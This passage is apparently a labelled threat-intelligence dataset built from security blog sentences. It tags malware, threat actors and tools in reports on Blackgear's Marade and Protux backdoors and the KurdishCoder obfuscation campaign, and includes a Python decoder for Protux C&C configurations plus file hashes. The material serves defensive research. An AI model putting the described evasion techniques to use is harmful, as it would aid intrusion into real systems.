code.","entities":[{"id":49270,"label":"malware","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":3471,"text":"The encrypted strings will pose as a magnet link to keep its malicious traffic from being detected by AV software.","entities":[],"relations":[],"Comments":[]} {"id":3472,"text":"Marade will then decrypt the encrypted strings and retrieve the C&C server information.","entities":[{"id":49271,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3473,"text":"The C&C server will send Protux to the victim’s host and execute it.","entities":[{"id":49272,"label":"malware","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} {"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} {"id":3475,"text":"It tests the host’s network, retrieves the C&C server from another blog, and uses the RSA algorithm to generate the session key and send information to the C&C server. Blackgear’s malware tools are delivered to targets using RAR self-extracting executable (SFX) files or office Visual Basic Script (VBScript) to create a decoy document.","entities":[{"id":49276,"label":"attack-pattern","start_offset":322,"end_offset":336},{"id":49275,"label":"threat-actor","start_offset":169,"end_offset":178}],"relations":[],"Comments":[]} {"id":3476,"text":"Below is a screenshot of the SFX files and document used by the latest campaigns: Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3477,"text":"Contents of malicious SFX file used by Blackgear, posing as a Flash Player installer Figure 4. Malicious document used by Blackgear (top) and how VBScript is used to execute Marade (bottom)","entities":[{"id":49277,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":49278,"label":"SOFTWARE","start_offset":62,"end_offset":74},{"id":49279,"label":"threat-actor","start_offset":123,"end_offset":132},{"id":49280,"label":"malware","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} {"id":3478,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":3479,"text":"Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux","entities":[{"id":49281,"label":"malware","start_offset":28,"end_offset":34},{"id":49282,"label":"malware","start_offset":45,"end_offset":51},{"id":49283,"label":"malware","start_offset":95,"end_offset":101},{"id":49284,"label":"malware","start_offset":106,"end_offset":112}],"relations":[{"id":778,"from_id":49283,"to_id":49284,"type":"variant-of"}],"Comments":[]} {"id":3480,"text":"The encrypted configurations of Marade and Protux can both be found on a single blog post.","entities":[{"id":49285,"label":"malware","start_offset":32,"end_offset":38},{"id":49286,"label":"malware","start_offset":43,"end_offset":49}],"relations":[],"Comments":[]} {"id":3481,"text":"As shown in Figure 5, the strings highlighted in red function as a search tag to identify the location of the configuration information; those highlighted in orange pertain to the encrypted configuration that Protux will retrieve.","entities":[{"id":49287,"label":"malware","start_offset":209,"end_offset":215}],"relations":[],"Comments":[]} {"id":3482,"text":"In Blackgear’s previous campaigns, Protux’s configuration format had to be changed to another version.","entities":[{"id":49288,"label":"threat-actor","start_offset":3,"end_offset":12},{"id":49289,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} {"id":3483,"text":"For instance, Protux’s older iteration will look for the “++a++” tag, as shown in Figure 5.","entities":[{"id":49290,"label":"malware","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} {"id":3484,"text":"The format used by Protux’s latest version is now similar to Marade’s, as shown in Figure 6.","entities":[{"id":10580,"label":"malware","start_offset":19,"end_offset":25},{"id":49291,"label":"malware","start_offset":61,"end_offset":67}],"relations":[],"Comments":[]} {"id":3485,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3486,"text":"Protux’s encrypted configuration on a public blog (note the six magnet URLs; the third is Protux’s latest configuration format)","entities":[{"id":10584,"label":"malware","start_offset":0,"end_offset":6},{"id":10589,"label":"malware","start_offset":90,"end_offset":96}],"relations":[],"Comments":[]} {"id":3487,"text":"Reverse analysis of Protux’s latest version also allowed us to determine how to decrypt the C&C information, which is done in the Python code shown below.","entities":[{"id":10590,"label":"malware","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} {"id":3488,"text":"This can also be used by researchers, system administrators, and information security professionals when decrypting Protux’s latest version.","entities":[{"id":49292,"label":"malware","start_offset":116,"end_offset":122}],"relations":[],"Comments":[]} {"id":3489,"text":"\/usr","entities":[],"relations":[],"Comments":[]} {"id":3490,"text":"bin","entities":[],"relations":[],"Comments":[]} {"id":3491,"text":"env python2","entities":[],"relations":[],"Comments":[]} {"id":3492,"text":"#-*-coding:utf-8 -*- import os, sys, datetime, operator, base64 def decrypt(): if len(sys.argv) != 2: print \"Usegae : .\/decrypt_protux_magnet.py \" sys.exit(0) str = sys.argv[1] head = str.find(\"magnet:?xt=urn:bhih:\")","entities":[],"relations":[],"Comments":[]} {"id":3493,"text":"tail = str.find(\"&xl=\") if -1 ==tail: tail = str.find(\"&xl=\") if -1 == head or -1 == tail: print(\"can't find delimiter\") sys.exit()","entities":[],"relations":[],"Comments":[]} {"id":3494,"text":"b64_data = str[len(\"magnet:?xt=urn:bhih:\"): tail] b64_decode = base64.b64decode(b64_data) key = ord(b64_decode[2]) data = b64_decode[4:] output_file = open(\"C2_info\", \"wb\") for single_byte in data: output_file.write(chr(ord(single_byte) ^ key)) output_file.close()","entities":[],"relations":[],"Comments":[]} {"id":3495,"text":"if __name__ == '__main__': decrypt (","entities":[],"relations":[],"Comments":[]} {"id":3496,"text":"A new remote controller tool","entities":[],"relations":[],"Comments":[]} {"id":3497,"text":"We were also able to source a sample of Protux’s remote controller tool.","entities":[{"id":49293,"label":"malware","start_offset":40,"end_offset":46}],"relations":[],"Comments":[]} {"id":3498,"text":"This provides a user interface (UI) that allows attackers to send instructions to and monitor any compromised endpoint host.","entities":[],"relations":[],"Comments":[]} {"id":3499,"text":"This tool can also remotely control Marade in the affected system.","entities":[{"id":49294,"label":"malware","start_offset":36,"end_offset":42}],"relations":[],"Comments":[]} {"id":3500,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":3501,"text":"The controller retrieving the Marade-related information (top) and collecting Protux-related information (bottom)","entities":[{"id":49296,"label":"malware","start_offset":30,"end_offset":36},{"id":49295,"label":"malware","start_offset":78,"end_offset":84}],"relations":[],"Comments":[]} {"id":3502,"text":"Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} {"id":3503,"text":"Each serves a specific role once in the system.","entities":[],"relations":[],"Comments":[]} {"id":3504,"text":"Marade acts as the first stage of attack, sending the compromised system’s information to the C&C server and then awaiting commands from the controller.","entities":[{"id":49299,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3505,"text":"This allows threat actors to monitor and check whether the affected system is of interest to them.","entities":[],"relations":[],"Comments":[]} {"id":3506,"text":"If so, the attack moves to the second stage by deploying Protux.","entities":[{"id":49300,"label":"malware","start_offset":57,"end_offset":63}],"relations":[],"Comments":[]} {"id":3507,"text":"The tool can also control the communication between the backdoor and attacker in real time.","entities":[],"relations":[],"Comments":[]} {"id":3508,"text":"The following is a list of Protux’s notable components and their functions: FileManage - Lists all of the system’s drives and folders.","entities":[{"id":49301,"label":"malware","start_offset":27,"end_offset":33}],"relations":[],"Comments":[]} {"id":3509,"text":"ProcManage - Lists all of the processes, modules, threads, and ports in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3510,"text":"ServiceManage - Lists all of the services in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3511,"text":"RegManage - Lists all of the registries in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3512,"text":"ScreenManage - Takes a screenshot.","entities":[],"relations":[],"Comments":[]} {"id":3513,"text":"ShellManage - Creates a shell.","entities":[],"relations":[],"Comments":[]} {"id":3514,"text":"Protux:","entities":[{"id":10643,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3515,"text":"An old dog learning new tricks Protux is an old backdoor, with its first version developed in 2005.","entities":[{"id":10644,"label":"malware","start_offset":31,"end_offset":37},{"id":49302,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} {"id":3516,"text":"It uses DLL injection to execute its routines.","entities":[],"relations":[],"Comments":[]} {"id":3517,"text":"Based on this behavior, we can map out a pattern, from the downloader to the decoy documents used.","entities":[],"relations":[],"Comments":[]} {"id":3518,"text":"The trigger format is: %system32\/rundll32.exe .","entities":[{"id":49303,"label":"FILEPATH","start_offset":23,"end_offset":45}],"relations":[],"Comments":[]} {"id":3519,"text":"We saw two notable changes throughout Protux’s history: its export name and how it functions:","entities":[{"id":49304,"label":"malware","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} {"id":3520,"text":" Export name Year How C&C information is retreieved TStartUp 2005 – 2012","entities":[{"id":49305,"label":"TIME","start_offset":61,"end_offset":72}],"relations":[],"Comments":[]} {"id":3521,"text":"Directly connect to the C&C server and use DNS server to retrieve the C&C IP address.","entities":[],"relations":[],"Comments":[]} {"id":3522,"text":"CRestart 2009 – 2014 Use web DNS query to retrieve the C&C IP address, e.g., ip138[.]com.","entities":[{"id":49306,"label":"TIME","start_offset":9,"end_offset":20},{"id":49307,"label":"DOMAIN","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} {"id":3523,"text":"CReset 2013 – 2018","entities":[{"id":49308,"label":"malware","start_offset":7,"end_offset":18}],"relations":[],"Comments":[]} {"id":3524,"text":"Find the encrypted configuration through keywords on blog services.","entities":[],"relations":[],"Comments":[]} {"id":3525,"text":" Our research into and correlation of Protux led us to several samples that have version numbers embedded in them.","entities":[{"id":10661,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} {"id":3526,"text":"The highlighted portions in Figure 8 show the backdoor’s version number and timestamp with the “with encrypt” strings.","entities":[],"relations":[],"Comments":[]} {"id":3527,"text":"We also found that these versions encrypt the communication to its C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":3528,"text":"Protux’s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} {"id":3529,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3530,"text":"Different versions of Protux used by Blackgear Figure 9.","entities":[{"id":49310,"label":"malware","start_offset":22,"end_offset":28},{"id":49311,"label":"threat-actor","start_offset":37,"end_offset":46}],"relations":[{"id":782,"from_id":49311,"to_id":49310,"type":"uses"}],"Comments":[]} {"id":3531,"text":"Protux with the OpenCSP encryption function Building a proactive incident response strategy Blackgear has been targeting various industries since its emergence a decade ago.","entities":[{"id":49314,"label":"threat-actor","start_offset":92,"end_offset":101},{"id":49312,"label":"malware","start_offset":0,"end_offset":7},{"id":49313,"label":"tools","start_offset":16,"end_offset":23}],"relations":[],"Comments":[]} {"id":3532,"text":"Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions.","entities":[],"relations":[],"Comments":[]} {"id":3533,"text":"For instance, Blackgear employs two stages of infection for each of its attacks.","entities":[{"id":49315,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":3534,"text":"The potential victim may not be able to notice the intrusions as the first stage involves only profiling and reconnaissance.","entities":[],"relations":[],"Comments":[]} {"id":3535,"text":"And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.","entities":[],"relations":[],"Comments":[]} {"id":3536,"text":"Indeed, Blackgear’s attacks exemplify the need for organizations to develop and implement security strategies that can proactively respond to threats.","entities":[{"id":49316,"label":"threat-actor","start_offset":8,"end_offset":18}],"relations":[],"Comments":[]} {"id":3537,"text":"A robust threat hunting strategy, for instance, helps validate indicators of attack to ascertain if the intrusions, threats, or suspicious system activities are one-off attacks or part of a larger campaign.","entities":[],"relations":[],"Comments":[]} {"id":3538,"text":"This further visibility equips organizations with actionable threat intelligence, context, and insights that can be used to delve deeper into an attack — which security gaps are exploited, if the attack has multiple payloads, or if the malware has already spread within the network.","entities":[],"relations":[],"Comments":[]} {"id":3539,"text":"Organizations can also consider managed detection and response, which provides in-depth threat analysis and correlation — from networks to servers and endpoints — to obtain a complete picture of and further understand a targeted attack.","entities":[],"relations":[],"Comments":[]} {"id":3540,"text":"Managed detection and response also helps make better sense of system- and network-level activities that an organization may not have the time or resources to do.","entities":[],"relations":[],"Comments":[]} {"id":3541,"text":"A list of indicators of compromise (IoCs) related to Blackgear is in this appendix.","entities":[{"id":49317,"label":"threat-actor","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} {"id":3542,"text":"Trend Micro solutions","entities":[{"id":49318,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3543,"text":"The Trend Micro™ Deep Discovery™ solution provides detection, in-depth analysis, and proactive response to today’s stealthy malware and targeted attacks in real time.","entities":[{"id":49319,"label":"identity","start_offset":4,"end_offset":15},{"id":49320,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} {"id":3544,"text":"It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack life cycle, allowing it to detect threats delivered by Blackgear even without any engine or pattern update.","entities":[{"id":49321,"label":"threat-actor","start_offset":269,"end_offset":278}],"relations":[],"Comments":[]} {"id":3545,"text":"Blackgear’s campaigns also use email as an entry point, which is why it’s important to secure the email gateway.","entities":[{"id":49322,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":49323,"label":"attack-pattern","start_offset":27,"end_offset":54}],"relations":[{"id":783,"from_id":49322,"to_id":49323,"type":"uses"}],"Comments":[]} {"id":3546,"text":"The Trend Micro™ Hosted Email Security no-maintenance cloud solution delivers continuously updated protection to stop spam, malware, spear phishing, and advanced targeted attacks before they reach the network.","entities":[{"id":49326,"label":"attack-pattern","start_offset":153,"end_offset":178},{"id":49324,"label":"identity","start_offset":4,"end_offset":15},{"id":49325,"label":"attack-pattern","start_offset":133,"end_offset":147}],"relations":[],"Comments":[]} {"id":3547,"text":"The Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security solutions prevent malware from ever reaching end users.","entities":[{"id":49329,"label":"tools","start_offset":53,"end_offset":62},{"id":49327,"label":"identity","start_offset":4,"end_offset":15},{"id":49328,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} {"id":3548,"text":"At the endpoint level, the Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of attacks.","entities":[{"id":49330,"label":"identity","start_offset":27,"end_offset":38}],"relations":[],"Comments":[]} {"id":3549,"text":" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} {"id":3551,"text":"During our analysis of the indicators of compromise (IoCs) in the deployed samples that were infecting the victim’s machines, we noticed some interesting characteristics: notably that these samples were making use of obfuscation tools that made them virtually undetectable.","entities":[],"relations":[],"Comments":[]} {"id":3552,"text":"After some data collection we found more than 300 samples that correlate to the mentioned indicators that were recently very active our first detections occurred in August, with the campaign itself still ongoing (having occasional spikes in between).","entities":[{"id":49335,"label":"TIME","start_offset":166,"end_offset":172}],"relations":[],"Comments":[]} {"id":3553,"text":"We saw a rising usage of tools that provide fully-undetectable obfuscation capabilities – signifying that the authors behind the samples designed their malware variants to be as stealthy as possible.","entities":[],"relations":[],"Comments":[]} {"id":3554,"text":"We decided to name the potential campaign associated with these IoCs as “KurdishCoder”, based on the property name of an assembly module found in one of the samples.","entities":[{"id":49336,"label":"campaign","start_offset":73,"end_offset":85}],"relations":[],"Comments":[]} {"id":3555,"text":"We took a look at one of the samples captured from Capesand that was used to deploy the njRat malware – notably its main executable NotepadEx.","entities":[{"id":10758,"label":"malware","start_offset":88,"end_offset":93},{"id":49337,"label":"malware","start_offset":51,"end_offset":59}],"relations":[{"id":786,"from_id":49337,"to_id":10758,"type":"delivers"}],"Comments":[]} {"id":3556,"text":"We found that were multiple layers of obfuscation using a combination of two tools: the .NET protectors ConfuserEx and Cassandra (CyaX).","entities":[{"id":49338,"label":"tools","start_offset":104,"end_offset":114},{"id":49339,"label":"tools","start_offset":119,"end_offset":135}],"relations":[],"Comments":[]} {"id":3557,"text":"Both of these tools are used in combination to provide an array of fully undetectable capabilities to the deployed njRat malware variant.","entities":[{"id":49340,"label":"malware","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} {"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} {"id":3559,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":3560,"text":"The infection chain for Capesand that also shows the obfuscation mechanisms For this particular sample, CyaX_Sharp is obfuscated with a customized version of ConfuserEx.","entities":[{"id":49348,"label":"tools","start_offset":104,"end_offset":114},{"id":49349,"label":"tools","start_offset":158,"end_offset":168},{"id":49347,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} {"id":3561,"text":"The following image shows an assembly module property that was generated for this sample.","entities":[],"relations":[],"Comments":[]} {"id":3562,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":3563,"text":"The generated assembly module property","entities":[],"relations":[],"Comments":[]} {"id":3564,"text":"The module’s property name is “KurdishCoderProducts”, with a value shown to be “ConfuserEx v1.0.0-custom”.","entities":[],"relations":[],"Comments":[]} {"id":3565,"text":" To understand where this value is coming from, let’s take a look at the open-source ConfuserEx tool to see how the values are created.","entities":[{"id":49350,"label":"tools","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} {"id":3566,"text":"From there, we can establish a hypothesis as to their source.","entities":[],"relations":[],"Comments":[]} {"id":3567,"text":"A closer look at ConfuserEx’s functions","entities":[{"id":49351,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} {"id":3568,"text":"While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.","entities":[{"id":49352,"label":"tools","start_offset":6,"end_offset":16}],"relations":[],"Comments":[]} {"id":3569,"text":" ConfuserEx is an open-source tool with multiple versions hosted on Github.","entities":[{"id":49353,"label":"tools","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} {"id":3570,"text":" By examining one of the community-supported versions, we can see there is a tool to build ConfuserEx from the command line.","entities":[{"id":49354,"label":"tools","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} {"id":3571,"text":"This build command line has a function to update the final binary versions based on the last Git-tagged version.","entities":[],"relations":[],"Comments":[]} {"id":3572,"text":"However, if ConfuserEx is built outside Git, the version update tool will just generate the value “version-custom” as shown below.","entities":[{"id":49355,"label":"tools","start_offset":12,"end_offset":22},{"id":49356,"label":"tools","start_offset":40,"end_offset":43}],"relations":[],"Comments":[]} {"id":3573,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3574,"text":"Code taken from a ConfuserEx version created outside GIT","entities":[{"id":49358,"label":"tools","start_offset":53,"end_offset":56},{"id":49357,"label":"tools","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} {"id":3575,"text":"Since the string “ConfuserEx v1.0.0-custom” is present in the module property: [module: KurdishCoderProducts(\"ConfuserEx v1.0.0-custom\")]”, we can surmise that the version of ConfuserEx that was used for CyaX_Sharp was indeed built outside of Git.","entities":[{"id":49359,"label":"tools","start_offset":175,"end_offset":185},{"id":49360,"label":"tools","start_offset":204,"end_offset":214},{"id":49361,"label":"tools","start_offset":243,"end_offset":246}],"relations":[],"Comments":[]} {"id":3576,"text":" 2. Watermarking","entities":[],"relations":[],"Comments":[]} {"id":3577,"text":"When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark – a unique identifier within the software--that is present in the final binary.","entities":[{"id":49362,"label":"tools","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} {"id":3578,"text":"The watermarking technique is implemented through the module attributes of the assembly.","entities":[],"relations":[],"Comments":[]} {"id":3579,"text":"The following source code screenshot shows how this is implemented.","entities":[],"relations":[],"Comments":[]} {"id":3580,"text":"Figure 4. Code showing how the watermarking is performed via the module attributes of the assembly","entities":[],"relations":[],"Comments":[]} {"id":3581,"text":"From the previous code section, we can see the default attribute added by ConfuserEx is “ConfusedBy”.","entities":[{"id":49363,"label":"tools","start_offset":74,"end_offset":84}],"relations":[],"Comments":[]} {"id":3582,"text":"If we test it using a sample binary, the following is generated: Figure 5. Testing a sample binary using ConfuserEx There are two important aspects to this attribute: first, it is hardcoded as a string constant and second, its value is presented in clear text in the final binary as the following image shows.","entities":[{"id":49364,"label":"tools","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} {"id":3583,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3584,"text":"The default attribute shown in clear text in the final binary We now have solid evidence that CyaX_Sharp was obfuscated using a modified version of ConfuserEx.","entities":[{"id":49365,"label":"tools","start_offset":94,"end_offset":104},{"id":49366,"label":"tools","start_offset":148,"end_offset":158}],"relations":[],"Comments":[]} {"id":3585,"text":"Next, let’s look for the attribute indicator, starting with the CyaX assembly used in the NotepadEx attack.","entities":[{"id":49368,"label":"campaign","start_offset":90,"end_offset":99},{"id":49367,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":789,"from_id":49368,"to_id":49367,"type":"uses"}],"Comments":[]} {"id":3586,"text":" Cassandra Protector: CyaX","entities":[{"id":49369,"label":"tools","start_offset":1,"end_offset":10},{"id":49370,"label":"tools","start_offset":22,"end_offset":26}],"relations":[],"Comments":[]} {"id":3587,"text":"After inspection we noticed that this version of CyaX was similarly notable due to two characteristics.","entities":[{"id":49371,"label":"tools","start_offset":49,"end_offset":53}],"relations":[],"Comments":[]} {"id":3588,"text":"First, the debug symbols paths were leaked -- suggesting a possible custom build which can be correlated with another modification applied to CyaX. Figure 7.","entities":[{"id":49372,"label":"tools","start_offset":142,"end_offset":146}],"relations":[],"Comments":[]} {"id":3589,"text":"The leaked debug symbols paths","entities":[],"relations":[],"Comments":[]} {"id":3590,"text":"The second indicator has to do with one of the methods of CyaX which was modified -- specifically the one injecting the binary in memory.","entities":[{"id":49373,"label":"tools","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} {"id":3591,"text":"The following image shows the modified function name.","entities":[],"relations":[],"Comments":[]} {"id":3592,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3593,"text":"The modified method which was renamed to Kirkuk, which is also a name of a city in Iraq What other payloads are using KurdishCoder?","entities":[],"relations":[],"Comments":[]} {"id":3594,"text":"Analysis of some of the captured samples reveals the different payloads being used (as shown in the table below).","entities":[],"relations":[],"Comments":[]} {"id":3595,"text":"Note that this does not cover all the samples – it is possible that other payloads are being deployed as well.","entities":[],"relations":[],"Comments":[]} {"id":3596,"text":" Sample Payload KurdishCoderMainSample KurdishCoder_CyaX_Sharp CyaX_method_rename CustomIncreaseX phoenix_keylogger Yes Yes Kirkuk NotePadEx Njrat No Yes Kirkuk QuickTranslation Agent Tesla Yes Yes Kurd SandiwchGenerator Agent Tesla Yes Yes Kirkuk SimpleGame Remcos Yes Yes Kirkuk AnimalGames Hawkeye Rebord Keylogger Yes Yes Kurd Table 1.","entities":[{"id":49374,"label":"malware","start_offset":178,"end_offset":189},{"id":49376,"label":"malware","start_offset":259,"end_offset":265},{"id":49375,"label":"malware","start_offset":221,"end_offset":232},{"id":49377,"label":"malware","start_offset":293,"end_offset":317}],"relations":[],"Comments":[]} {"id":3597,"text":"The different samples organized name, payload delivered and the fully-undetectable stages where the attribute “KurdishCoderProduction” is present","entities":[],"relations":[],"Comments":[]} {"id":3598,"text":"Cassandra Crypter","entities":[{"id":49378,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":3599,"text":"We think one of the possible sources of the customized ConfuserEx is the online service Cassandra Crypter, which offers two kinds of subscription plans: The Premium Plan and the Private Stub.","entities":[{"id":49380,"label":"tools","start_offset":88,"end_offset":105},{"id":49379,"label":"tools","start_offset":55,"end_offset":65}],"relations":[],"Comments":[]} {"id":3600,"text":"The Premium Plan requires payment and works automatically, while the Private Stub requires the user to contact the support from the service for further personalization.","entities":[],"relations":[],"Comments":[]} {"id":3601,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3602,"text":"Cassandra Crypter’s subscription plans","entities":[{"id":49381,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":3603,"text":"The combination of ConfuserEx and CyaX (Cassandra protector) seems to be unique and customized based on the indicators mentioned earlier.","entities":[{"id":49382,"label":"tools","start_offset":19,"end_offset":29},{"id":49383,"label":"tools","start_offset":34,"end_offset":39},{"id":49384,"label":"tools","start_offset":40,"end_offset":59}],"relations":[],"Comments":[]} {"id":3604,"text":" While we don’t have definitive evidence that the use of these tools are part of a single campaign, we think the analyzed samples are related to a specific campaign.","entities":[],"relations":[],"Comments":[]} {"id":3605,"text":"Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident.","entities":[{"id":49385,"label":"identity","start_offset":61,"end_offset":138}],"relations":[],"Comments":[]} {"id":3606,"text":"As with Capesand, we will be monitoring the use of the tools mentioned in this blog entry for any future developments and updates.","entities":[{"id":49386,"label":"malware","start_offset":8,"end_offset":16}],"relations":[],"Comments":[]} {"id":3607,"text":"Trend Micro Solutions","entities":[{"id":49387,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":3608,"text":"A proactive, multilayered approach to security is key against a wide range of threats— from the gateway, endpoints, networks, and servers.","entities":[],"relations":[],"Comments":[]} {"id":3609,"text":"Trend Micro™ endpoint security has vulnerability protection that shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.","entities":[{"id":49388,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3610,"text":"Trend Micro’s endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from these threats by detecting and blocking malicious files and all related malicious URLs.","entities":[{"id":49389,"label":"identity","start_offset":0,"end_offset":11},{"id":49390,"label":"identity","start_offset":41,"end_offset":52}],"relations":[],"Comments":[]} {"id":3611,"text":"Indicators of Compromise (IoCs) Indicator Attribution Trend Micro Pattern Detection 068d32a43191dc0164b600b85a1621be0154504fd477167422ff4a8fb3406d73 AnimalGames Backdoor.","entities":[{"id":10902,"label":"SHA2","start_offset":85,"end_offset":149},{"id":49391,"label":"identity","start_offset":55,"end_offset":66},{"id":49392,"label":"malware","start_offset":150,"end_offset":170}],"relations":[{"id":790,"from_id":10902,"to_id":49392,"type":"indicates"}],"Comments":[]} {"id":3612,"text":"MSIL.BLADABINDI.QBR","entities":[{"id":49393,"label":"malware","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3613,"text":"07be156caac1157707ffe38266dc60abadc488226b4f41d67f23eac98dd917b0","entities":[{"id":10903,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} {"id":3614,"text":"CustomIncreaseX Backdoor.MSIL.BLADABINDI.QBR b00cc9a4292fc5cc4ae5371ea1615ec6e49ebaf061dc4eccde84a6f96d95747c NotePadEx Backdoor.MSIL.BLADABINDI.QBR 6755ce7a362ffecef805e4c54e1d5e201b6c6d561b997ebbd63a8d814ce6a53f QuickTranslation Backdoor.MSIL.BLADABINDI.QBR 8ff11efc1109073fdc49be93e1d100992314fd68ecdff2ba986107602ce75089 SandwichGenerator Backdoor.MSIL.BLADABINDI.QBR 02f2369b58fbb2ba1df2c799b73842880a4874c32c1514a0d8956133be026ade SimpleGame Backdoor.Win32.REMCOS.USMANEAGDZ","entities":[{"id":10904,"label":"SHA2","start_offset":45,"end_offset":109},{"id":10905,"label":"SHA2","start_offset":149,"end_offset":213},{"id":10907,"label":"SHA2","start_offset":372,"end_offset":436},{"id":10906,"label":"SHA2","start_offset":260,"end_offset":324},{"id":49394,"label":"malware","start_offset":16,"end_offset":44},{"id":49395,"label":"malware","start_offset":120,"end_offset":148},{"id":49396,"label":"malware","start_offset":231,"end_offset":259},{"id":49398,"label":"malware","start_offset":448,"end_offset":480},{"id":49397,"label":"malware","start_offset":343,"end_offset":371}],"relations":[],"Comments":[]} {"id":3615,"text":" Tags Mobile | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":3616,"text":"Spear Phishing is a specific attack technique that has become widely used in the past few 